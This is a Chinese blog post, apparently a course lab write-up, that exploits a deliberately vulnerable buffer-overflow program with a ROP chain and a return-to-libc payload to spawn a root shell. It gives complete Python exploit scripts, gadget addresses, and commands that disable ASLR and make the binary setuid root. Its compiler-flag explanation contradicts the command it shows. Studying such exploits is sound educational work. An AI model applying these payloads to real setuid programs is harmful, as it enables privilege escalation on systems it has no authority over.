华科信息系统安全作业2:ROP与Return2Libc攻击

最新推荐文章于 2024-08-12 22:28:28 发布
最新推荐文章于 2024-08-12 22:28:28 发布
阅读量800 收藏 11
点赞数
文章标签: linux ubuntu 堆栈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46237311/article/details/115701579
版权

华科信息系统安全作业2:ROP与Return2Libc攻击

作业要求

homework2.c有缓冲区溢出漏洞,利用return2libc或rop攻击, 编写exploit程序来构建恶意输入文件,攻击目标为运行shell

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int vulfunc(char *str){
 char buffer[25];
 strcpy(buffer, str);
 return 1;
}

int main(){
 char str[500];
 FILE *badfile;
 badfile = fopen("badfile","r");
 fread(str, sizeof(char), 400, badfile);
 vulfunc(str);
 printf("Returned properly\n");
 fclose(badfile);
 return 0;
}

1. ROP

1.1 安装ROPgadget

对于ubuntu16.04,默认安装了python2,只需要安装pip即可,然后再安装ROPgadget依赖capstone,就能顺利安装ROPgadget了,命令如下:

sudo apt-get install python-pip  
sudo pip install capstone  
sudo pip install ROPgadget

1.2 环境

在这里插入图片描述
地址随机化打开

sudo sysctl -w kernel.randomize_va_space=2

之后编译目标文件stack.c,其中参数-fno-stack-protector用来关闭gcc编译器gs验证码机制, -z execstack用来关闭ld链接器堆栈段不可执行机制

gcc  -g -fno-stack-protector -z nonexecstack -static -o stack_gdb stack.c

设置程序文件的owner为root

sudo chown root stack_gdb
sudo chmod 4755 stack_gdb

1.3 EIP与buffer的距离

只需将buffer[100]填充为1~100的数字来标志其位置,出错位置即为所求
脚本如下:

import sys

# fill content with none zero values
content = bytearray(0x01 for i in range(100));

for i in range(100):
	content[i] += i

badfile = open("badfile", "wb")
badfile.write(content)
badfile.close()

在这里插入图片描述
得之,0x25 = 37 bit 为system起始地址.

1.4 badfile & Attack

运行命令ROPgadget --binary ./stack --ropchain分析测试程序,生成gadget链
Padding代码如下:

from struct import pack
p = ''
for i in range(37):
    p += pack('<B', 0xaa)
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080b8c86) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08054a9b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x080b8c86) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08054a9b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080494a3) # xor eax, eax ; ret
p += pack('<I', 0x08054a9b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080df505) # pop ecx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080494a3) # xor eax, eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0806cde5) # int 0x80
badfile = open("badfile", "wb")
badfile.write(p)
badfile.close()

生成badfile(注意,此处必须使用python2运行,python3会报错)
最终执行
在这里插入图片描述

2. Return2libc

环境配置

在这里插入图片描述
关闭地址随机化
在这里插入图片描述

sudo sysctl -w kernel.randomize_va_space=0

编译,关闭可执行栈、关闭StackGuard

gcc -fno-stack-protector -z nonexecstack -o stack stack.c

设置程序文件的owner为root

sudo chown root stack
sudo chmod 4755 stack

Task A :查找system()的地址

p system
p exit

在这里插入图片描述
这里system 的地址为0xb7e43da0,exit的地址为0xb7e379d0

Task B :查找 “/bin/sh” 字符串的地址

在这里插入图片描述
在环境变量中export该字符串,后查询地址为0xbffffe58
代码如下:

-----env.c-----
#include<stdio.h>
int main(){
	char *shell = (char*)getenv("MYSHELL");
	if(shell){
		printf("VALUE: %s\n",shell);
		printf("ADDRESS: %x\n",(unsigned int)shell);
	}
}

Task C : 为system()构造参数,在堆栈中查找位置以放置“/bin/sh” 地址(system()的参数)

再次用gdb调试程序,同样设置断点在vulfunc,主要是为了进入堆栈段,单后打印MYSHELL=”/bin/sh”所在地址周围的串,可以找到其在栈中地址为0xbffffe4d
命令为x /500s 0xbffffe40
在这里插入图片描述
MYSHELL地址为0xbffffe4d,不过后来测试的时候发现还是0xbffffe58,若为此时的地址,会出错
在这里插入图片描述
寻找EIP,即返回地址,之后要指向system函数的地址
b vulfunc 用gdb调试代码,设置断点在函数vulfunc中
p $ebp 运行到断点后,查看ebp与buffer地址
p &buffer
p/d 0xbfffed98 - 0xbfffed77 计算偏移为0x21 = 33
在这里插入图片描述
在这里插入图片描述
33+4=37 故想覆盖[esp+4] = EIP需要预先填充37个字节

具体覆盖位置如下:
在这里插入图片描述
故system地址在ebp+4,exit地址在ebp+8,MYSHELL地址在ebp+12,代码如下:

#!/usr/bin/python3
import sys

# Fill the content with NOPs
content = bytearray(0x90 for i in range(300))

# "/bin/sh"
#ebp+12
shell = 0xbffffe58
content[45:49] = (shell).to_bytes(4,byteorder='little')

# exit
#ebp+8
exit = 0xb7e379d0
content[41:45] = (exit).to_bytes(4,byteorder='little')


# system
sys =  0xb7e43da0
#ebp+4
content[37:41] = (sys).to_bytes(4,byteorder='little')

# Write the content to a file
file = open("badfile", "wb")
file.write(content)
file.close()

运行,可以得到如下命令行:
在这里插入图片描述

weixin_46237311
关注
华科信息系统安全作业: 利用ret2libc实现控制流劫持
finelaoy的博客
04-21 658
记录信息系统安全的一次利用ret2libc作业
64位linux系统:栈溢出+ret2libc ROP attack
Zhangmii的博客
06-03 2391
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libcreturn-into-libc)是一种利用缓冲区溢出的代码复用技术,主要通过...
【HUST】信息系统安全:系统调用介入作业,安全策略制定,指定安全策略
weixin_45695828的博客
05-21 958
如果按照上一篇做完的话,应该已经可以通过攻击打开一个shell了,那么接下来就该防止他打开shell了。 严格意义上,对于一个安全策略而言,如果你想要让他足够安全的话,那么他最好只能执行你允许的操作,而不是让他执行不能执行的操作,但在这次实验中,如果想要执行打开shell,然后再去进行规则的指定,至少在这里几乎一定会产生冲突,所以只能用限制操作的方式来进行操作,不过这里还是不得不说一句,谁设计防护的时候还要去规范攻击者行为的。 这里直接把代码贴上来,其实这...
return2libc学习笔记
omnispace的博客
03-29 4718
0x00 背景介绍 author:万抽抽 r2libc技术是一种缓冲区溢出利用技术,主要用于克服常规缓冲区溢出漏洞利用技术中面临的no stack executable限制(所以后续实验还是需要关闭系统的ASLR,以及堆栈保护),比如PaX和ExecShield安全策略。该技术主要是通过覆盖栈帧中保存的函数返回地址(eip),让其定位到libc库中的某个库函数(如,system等),而不是
Return to Libc Attack
大草的博客
05-19 1685
我们利用缓冲区漏洞,将恶意代码shellcode附加在缓冲区的后面。通过覆盖返回地址,跳转到恶意代码,执行栈中的shellcode代码。但是,现在的操作系统已经作出防御,禁止栈中的数据作为代码执行。但是这个并没有关系,我们可以不在栈中执行程序,我们可以通过覆盖返回地址,执行已经在内存中存在的程序,比如说libc中的system函数。我们希望跳转之后,可以执行system("/bin/sh")。这个做法的难点是,在哪里放置"/bin/sh"的地址,作为system的参数。
华中科技大学网安学院信息系统安全实验 系统安全 APPARMOR
Bourne的博客
06-24 2874
2.1 APPARMOR实验 2.1.1 实验目的 AppArmor是linux系统中提供的一种强制访问控制方法,与SELinux类似,AppArmor 通过提供强制访问控制(MAC) 来补充传统的Linux自主访问控制(DAC) 。AppArmor允许系统管理员通过为每个程序进行权限配置,来限制程序的功能。配置文件可以允许诸如网络访问、原始套接字访问以及在匹配路径上读取、写入或执行文件的权限等功能。本实验的学习目标是让学生根据不同程序的访问控制需求,使用AppArmor进行访问控制配置,理解最小特权原则,
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 685
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
信息安全技术大作业ROP,,江南大学
07-05
《信息安全技术》大作业主要探讨了面向返回的编程(Return-oriented Programming,简称ROP)这一重要的安全攻防技术。ROP是一种利用程序自身代码片段构造攻击序列的技术,尤其在现代软件安全领域具有深远影响。 **...
ROP和Ret2libc漏洞
最新发布
qq_67812668的博客
08-12 936
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
Rompmporium漏洞:ROP Emporium漏洞
02-15
2. **Stack Pivot**:在许多ROP攻击中,攻击者需要改变程序的栈指针以控制执行流程。这可能涉及到找到并使用特定的gadgets。 3. **Value计算**:有时,攻击者需要计算特定值,这可能涉及到使用gadgets执行算术运算。...
栈溢出学习(二)Return2Libc
毒饺子的博客
10-24 1024
跟随教程https://sploitfun.wordpress.com/2015/ 此次实验参考https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/ 又看到一个好的博客,也是栈溢出系列:https://www.ret2rop.com/2018/08/return-to-libc.html NX保护机制 ​ NX保护机制原则为可写与可执行互斥,这就导致我们之前在栈上的shellcode不可以被执行,因
栈溢出之Return2libc
Yannie's Blog
12-09 1050
参考文章:https://zhuanlan.zhihu.com/p/25816426 我们利用函数调用来实现攻击,核心目的是用攻击指令的地址来覆盖返回地址 通常用的有以下四种方法: 修改返回地址,让其指向溢出数据中的一段指令(shellcode) 修改返回地址,让其指向内存中已有的某个函数(return2libc) 修改返回地址,让其指向内存中已有的一段指令(ROP) 修改某个被调用函数的地址,让...
Return-into-libc分析
JD san的博客
05-05 971
经典缓冲区溢出: 利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位置,甚至包括控制程序 执行流的关键数据(比如函数调用后的返回地址),从而控制程序的执行过程并实施恶意行为。因此,攻击者通过篡改函数的返回地址以其指向自己纺织的恶意shellcode,这样函数返回时就可以跳转到相应的恶意代码来执行,即将恶意代码注入目标程序,并在以后跳转到此执行此代码。 提出的安全机制: 针对这种先写后执...
[PWN][高级篇]ROP-ret2libc基础知识
网络安全知识分享
03-27 2104
ROP-ret2libc基础知识 前提知识准备Linux延时绑定机制Linux演示绑定机制的实现延迟绑定对我们有什么意义libc函数在哪?ret2libc使用条件如何使用libcplt表和got表的关系整体的跟踪 前提知识准备 Linux延时绑定机制 动态连接的程序调用了libc的库函数,但是libc在运行才被加载到内存中,调用libc函数时,才解析出函数在内存中的地址,为了帮助程序更好的利用内存空间,不用每次把所有的函数真实地址都写进去,用到哪个查哪个,之后在使用就会很方便。 Linux演示绑定机制的实现
使用Return2LibC利用栈溢出漏洞
panfengblog
04-12 745
使用Return2LibC利用栈溢出漏洞 环境:ubuntu16.04, gcc, gdb, 说明:为了成功实现Return2LibC攻击,这里打开了可执行栈、关闭了StackGuard、关闭了地址随机化 1. 存在栈溢出漏洞的程序 如下就是我们的测试代码homework2.c,使用strcpy函数,但却没有判断字符串长度,存在栈溢出漏洞。 #include <stdlib.h> #include <stdio.h> #include <string.h> int v
ROP(Return Oriented Programming)
iextract的博客
04-26 5139
ROP 在ret2libc中提到了ROP,今天在此详细记录 在YouTube看rop的视频时,视频制作者提及这项技术是Hovav Shacham 于2007年首先展示出来,很是震惊,现在已经是2017年了,10年之内技术又进步到哪里了呢?还望自己勤勉学习,能早一日看见顶峰 rop的起源每一项技术的出现,背后必定有存在的意义,在ret2libc中,我们提及这是为了对抗DEP/NX即W^N技术
华中科技大学网安学院 信息系统安全实验 软件安全 SEEDLAB 格式化字符串漏洞利用实验
Bourne的博客
06-25 4300
格式很丑 凑合看吧 懒得调了 1 实验一 软件安全 1.1 格式化字符串漏洞实验 1.1.1实验目的 在缓冲区溢出漏洞利用基础上,理解如何进行格式化字符串漏洞利用。C 语言中的 printf() 函数用于根据格式打印出字符串,使用由 printf() 函数的 % 字符标记的占位符,在打印期间填充数据。格式化字符串的使用不仅限于 printf() 函数;其他函数,例如 sprintf()、fprintf() 和 scanf(),也使用格式字符串。某些程序允许用户以格式字符串提供全部或部分内容。本实验
栈溢出学习(二)之 jmp esp & return2libc
Pz_mstr's Blog
03-22 3140
前言 栈溢出学习(二),针对一个例子,进行各种栈溢出技术的练习。本文内容承接栈溢出学习(一) 本文属于新手实验难度,过程比较详细,适合新手学习 样例代码 本文使用的代码如下 #include <stdio.h> #include <stdlib.h> #include <string.h> /* * compiled with: * gcc -...
Return-to-libc攻击实验
qq_29687403的博客
07-17 5515
Return-to-libc攻击实验 Return-to-libc攻击是一种特殊的缓冲区溢出攻击,通常用于攻击有“栈不可执行”保护措施的目标系统。本实验中我们将用system()地址替换返回地址,用它调用一个root shell。
"江南大学信息安全技术大作业:探究新型攻击技术ROP
信息安全技术大作业主题为ROPReturn-oriented Programming,面向返回的编程)攻击ROP是一种基于代码复用技术的攻击攻击者通过从已有的库或可执行文件中提取指令片段,构建恶意代码。本文将对ROP攻击的原理、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值